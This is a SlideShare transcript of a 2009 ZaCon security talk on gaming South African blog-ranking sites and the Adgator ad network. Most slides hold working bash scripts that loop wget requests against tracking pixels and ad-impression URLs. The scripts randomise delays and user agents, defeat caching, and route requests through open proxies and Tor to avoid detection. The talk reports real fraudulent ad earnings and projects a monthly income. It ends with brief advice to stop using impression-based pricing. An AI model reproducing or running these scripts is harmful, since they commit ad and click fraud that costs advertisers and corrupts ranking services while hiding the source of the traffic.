Your SlideShare is downloading. ×
Smashing the stats for fun (and profit)
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Smashing the stats for fun (and profit)

825
views

Published on

Shaun Dewberry …

Shaun Dewberry
ZaCon 2009
http://www.zacon.org.za/Archives/2009/slides/

Published in: Technology

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
825
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
7
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. If  you’re  not  famous,  fake  it.  
  • 2.   Shaun  Dewberry       Unix/Security  guy     Pretoria  University  (expelled  for  hacking!)     aka  LowVoltage  
  • 3.   Technorati.com     In  SA:     Amatomu.com     Afrigator.co.za     Blogger  pissing  contest  
  • 4. <!-­‐-­‐  Start  AMATOMU.COM  code  -­‐-­‐>   <img  height='1'  style='display:none'  width='1'   src='http://www.amatomu.com/log.php? cid=a433e87b0ebYe493dc055153ae332be0ee da46c'  />   <!-­‐-­‐  End  AMATOMU.COM  code  -­‐-­‐>  
  • 5.   Slow     Not  really  automated     Boring     Obvious     Traceable  
  • 6. while  [  1  ]  do   wget  http://www.amatomu.com/log.php? cid=a433e87b0eb>e493dc055153ae332be0eeda46c   done;  
  • 7.   Don’t  crash  the  server!     More  random  log  entries   #!/bin/sh   Set  RANDOM=$$   while  [  1  ]   do   let  "delay  =  RANDOM  %  30";    #  Random  0  to  30  Second  delay   wget  http://www.amatomu.com/log.php? cid=a433e87b0eb>e493dc055153ae332be0eeda46c   echo  "Waiting  $delay  seconds"   sleep  $delay   done;  
  • 8. #!/bin/bash   set  RANDOM=$$   while  [  1  ]   do   let  "delay  =  RANDOM  %  6";    wget  -­‐-­‐delete-­‐after  http://afrigator.com/track/5013-­‐none.gif   sleep  $delay;     done;  
  • 9.   wget  User-­‐Agent  visible  in  server  logs     All  visits  from  same  source  IP  address  
  • 10.   http://www.user-­‐agent.org   "Mozilla/4.0  (compatible;  MSIE  7.0;  Windows  NT  5.1;  .NET  CLR  1.1.4322;  .NET  CLR   2.0.50727;  .NET  CLR  3.0.04506.30   Mozilla/5.0  (Windows;  U;  Windows  NT  6.0;  en-­‐US;  rv:1.9.0.4)  Gecko/2008102920  Firefox/3.0.4   Mozilla/5.0  (Windows;  U;  Windows  NT  5.1;  en-­‐US;  rv:1.9.0.4)  Gecko/2008102920  Firefox/3.0.4   Mozilla/5.0  (X11;  U;  Linux  i686;  en-­‐US;  rv:1.9.0.2)  Gecko/2008092313  Ubuntu/8.04  (hardy)   Firefox/3.1   Mozilla/5.0  (Windows;  U;  Windows  NT  6.0;  en-­‐US;  rv:1.9.0.2)  Gecko/2008091620  Firefox/3.0.2   Mozilla/5.0  (Windows;  U;  Windows  NT  5.1;  en-­‐US;  rv:1.9.0.1)  Gecko/2008070208  Firefox/3.0.0   Mozilla/5.0  (Windows;  Windows  NT  5.1;  en-­‐US;  rv:1.8.1.9)  Gecko/20071025  Firefox/2.0.0.9   Mozilla/5.0  (Windows;  U;  Windows  NT  5.1;  en_US;  rv:1.8.1.6)  Gecko/20070725  Firefox/2.0.0.7   Mozilla/5.0  (Windows;  U;  Windows  NT  5.1;  en-­‐US)  AppleWebKit/525.19  (KHTML,  like  Gecko)   Chrome/0.4.154.18  Safari/525.19  
  • 11. set  RANDOM=$$   while  [  1  ]   do   let  "delay  =  RANDOM  %  30"   let  "ua  =  RANDOM  %  `wc  -­‐l  useragents.txt  |  awk  '{print  $1}'`  +  1"   uastring=`sed  -­‐n  ${ua}p  useragents.txt;`    wget  -­‐q  -­‐-­‐delete-­‐after  -­‐-­‐user-­‐agent="$uastring"  http:// www.amatomu.com/log.php? cid=a433e87b0eb>e493dc055153ae332be0eeda46c   sleep  $delay   done;  
  • 12. “Tor  protects  you  by  bouncing  your   communications  around  a  distributed   network  of  relays  run  by  volunteers  all  around   the  world:  it  prevents  somebody  watching   your  Internet  connection  from  learning  what   sites  you  visit,  and  it  prevents  the  sites  you   visit  from  learning  your  physical  location.”                -­‐-­‐torproject.org  
  • 13. wget   tsocks   tor     Aggregator   •   tsocks.sourceforge.net  –  Transparent  Socks  Proxy  
  • 14.   #20  of  31  “ top  non-­‐US  startups  to  watch   worldwide”  by  Business  2.0  (money.cnn.com)     Top  10  International  Products  for  2008  –   ReadWriteWeb     Acquired  by  Naspers     Blah  blah  blah…     WTF?  Security  Anyone?  
  • 15.   Invitations  to  launches     More  traffic  (ironic,  isn’t  it?)     Gadgets  for  review     Press  accreditation     Fake  a  career  as  a  social  media  expert     Social  engineering  hack  
  • 16.   Ad  network  linking  bloggers  and  advertisers     Revenue  based  on  CPM  (ad  impressions)     CPM  is  horribly  broken  
  • 17. <!-­‐-­‐/*  Adgator.co.za  Javascript  Tag  v2.6.3  */-­‐-­‐>    <script  type='text/javascript'><!-­‐-­‐//<![CDATA[        var  m3_u  =  (location.protocol=='https:'?'https://ads.adgator.co.za/delivery/ajs.php':'http://ads.adgator.co.za/delivery/ajs.php');        var  m3_r  =  Math.floor(Math.random()*99999999999);        if  (!document.MAX_used)  document.MAX_used  =  ',';        document.write  ("<scr"+"ipt  type='text/javascript'  src='"+m3_u);        document.write  ("?zoneid=471");        document.write  ('&amp;cb='  +  m3_r);        if  (document.MAX_used  !=  ',')  document.write  ("&amp;exclude="  +  document.MAX_used);        document.write  (document.charset  ?  '&amp;charset='+document.charset  :  (document.characterSet  ?   '&amp;charset='+document.characterSet  :  ''));        document.write  ("&amp;loc="  +  escape(window.location));        if  (document.referrer)  document.write  ("&amp;referer="  +  escape(document.referrer));        if  (document.context)  document.write  ("&context="  +  escape(document.context));        if  (document.mmm_fo)  document.write  ("&amp;mmm_fo=1");        document.write  ("'></scr"+"ipt>");   //]]>-­‐-­‐></script><noscript><a  href='http://ads.adgator.co.za/delivery/ck.php?n=ad677422&cb=INSERT_RANDOM_NUMBER_HERE'   target='_blank'><img  src='http://ads.adgator.co.za/delivery/avw.php?zoneid=471&n=ad677422'  border='0'  alt=''  /></a></noscript>   Only  care  about  ad  image:  http://ads.adgator.co.za/delivery/avw.php? zoneid=471&n=ac71ad4f  
  • 18.   No  ads  are  served  to  wget??     OpenX  Ad  Server     If  no  cookie  gets  set,  then  no  ad  gets  served     Certain  User  Agents  are  ignored     First  ad  served,  but  no  ads  thereafter   (caching?)     Geo-­‐targeting  
  • 19.   Accept  cookies  (and  turf  them)     &cb=RANDOM  parameter  (Cache  blocking)     tor  nodes  in  ZA?     Zombie  TelkomADSL  botnet?     Open  proxy  servers  –  Proof  of  Concept  
  • 20. let  "delay  =  RANDOM  %  40"    #  Up  to  40  second  delay  –  let’s  not  be  greedy   let  "prand  =  RANDOM  %  `wc  -­‐l  proxies.txt  |  awk  '{print  $1}'`  +  1"     http_proxy=`sed  -­‐n  ${prand}p  proxies.txt;`  #  select  a  random  proxy   let  "ua  =  RANDOM  %  `wc  -­‐l  useragents.txt  |  awk  '{print  $1}'`  +  1"   uastring=`sed  -­‐n  ${ua}p  useragents.txt;`  #  random  useragent   let  "rand  =  RANDOM  %  999999999"  #  random  integer  for  cache  blocking    if  [  $http_proxy  ==  "tsocks"  ];  then    #    1/3rd  of  the  time  route  through  tor        export  http_proxy=        /usr/bin/tsocks  /usr/local/bin/wget  -­‐-­‐no-­‐clobber  -­‐-­‐no-­‐cache  -­‐-­‐max-­‐redirect=0  -­‐-­‐ user-­‐agent="$uastring"  -­‐-­‐referer=http://ramboguy.co.za  "http:// ads.adgator.co.za/delivery/avw.php?zoneid=471&n=ac71ad4f&cb=$rand"    else        #  otherwise  request  the  ad  straight  through  the  SA  proxy    /usr/bin/wget  -­‐d  -­‐-­‐no-­‐clobber  -­‐-­‐no-­‐cache  -­‐-­‐user-­‐agent="$uastring"  -­‐-­‐ referer=http://ramboguy.co.za  "http://ads.adgator.co.za/delivery/avw.php? zoneid=471&n=ac71ad4f&cb=$rand"    fi  
  • 21. •   90  Ad  impressions/day   •   Paid  Ads  Served:  224   •   Earnings:  R11.09  
  • 22. •   800  impressions/day        (2  hour  run)   •   1677  Paid  Ads  Served   •   Earnings:  R86.58      
  • 23.   Automated  auditing  with  complex  analysis   tools     Don’t  use  impression  based  costing  models   (duh!)  
  • 24.   R8  per  hour  (conservative)     24  hours     30  days     R  5  760  per  month     Mahala     The  beer’s  on  me!